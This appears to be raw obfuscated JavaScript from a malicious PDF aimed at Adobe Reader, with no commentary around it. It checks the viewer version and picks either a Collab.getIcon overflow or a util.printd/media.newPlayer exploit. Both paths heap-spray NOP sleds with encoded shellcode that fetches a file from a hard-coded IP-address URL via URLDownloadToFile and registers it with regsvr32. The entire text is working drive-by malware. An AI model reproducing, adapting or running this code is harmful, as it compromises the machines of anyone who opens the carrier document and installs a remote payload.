var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3764%u702E%u7068%u663F%u673D%u0000';var 
_2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3864%u702E%u7068%u663F%u6E3D%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var 
_1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('
');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}